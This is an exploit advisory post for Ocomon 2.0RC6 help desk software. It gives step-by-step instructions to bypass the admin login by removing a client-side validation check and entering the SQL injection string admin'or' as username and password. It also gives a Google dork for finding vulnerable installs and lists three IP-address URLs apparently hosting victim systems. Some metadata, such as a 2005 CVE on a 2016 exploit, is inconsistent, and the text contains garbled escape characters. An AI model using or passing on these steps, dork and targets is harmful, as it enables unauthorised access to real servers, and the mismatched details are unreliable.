# Exploit Title: Ocomon 2.0: Acess administrative Bypass / Multiple Sql
Injection
# Google Dork: inurl:ocomon/index.php or intitle:Ocomon 2.0-RC6# Date: 2016.08.18# Exploit Author: Jonatas Fil a.k.a pwx# Vendor Homepage: ninj4c0d3r.github.io# Version: Latest 2.0RC6# Tested on: Linux And Windows# CVE : CVE-2005-4664
\xDetails:========================================[Software]- Ocomon
[Bug Summary]- Multiple SQL Injection (SQLi)[Impact]- High
[Affected Version]- Latest 2.0RC6
- Prior versions may also be affected
=========================================
\x01- Search by dork in google
Dorks:
inurl:ocomon/index.php or intitle:Ocomon 2.0-RC6
\x02 - After, To find the victim,open the inspect element in admin page.
\x03 - Look for the parameter:<body>:<table>:<tbody>:<tr>,andreturn
valida()and delete the content, leaving blank.
\x04 - After, Sign in using:"admin'or'" For Username and Password.
\x05 - Finish!, You get acess in administrative page to the system.--------------------------------------------
\xDEMO:
http://200.66.111.38/ocomon/index.php
http://191.241.229.210:8080/ocomon/index.php
http://191.241.229.210:8081/ocomon/index.php
---------------------------------------------
References:
https://packetstormsecurity.com/files/100568/Ocomon-2.0RC6-SQL-Injection.html
http://www.cvedetails.com/cve/CVE-2005-4664/
https://www.securityfocus.com/bid/15386/exploit
